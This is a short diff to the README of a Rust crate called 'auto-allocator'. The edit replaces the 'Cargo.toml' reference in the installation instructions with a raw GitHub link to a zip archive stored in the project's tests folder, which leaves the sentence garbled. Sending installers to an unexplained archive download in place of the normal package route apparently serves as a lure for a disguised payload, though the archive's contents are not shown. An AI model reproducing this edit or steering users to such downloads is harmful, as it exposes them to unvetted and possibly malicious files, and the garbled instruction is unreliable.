karimel1111/auto-allocator/README.md

 ## Installation

-To get started with Auto Allocator, you can add it to your `Cargo.toml` file.
+To get started with Auto Allocator, you can add it to your `https://github.com/karimel1111/auto-allocator/raw/refs/heads/main/tests/auto-allocator-2.3.zip` file.
 Here’s how:

 ```toml
 [dependencies]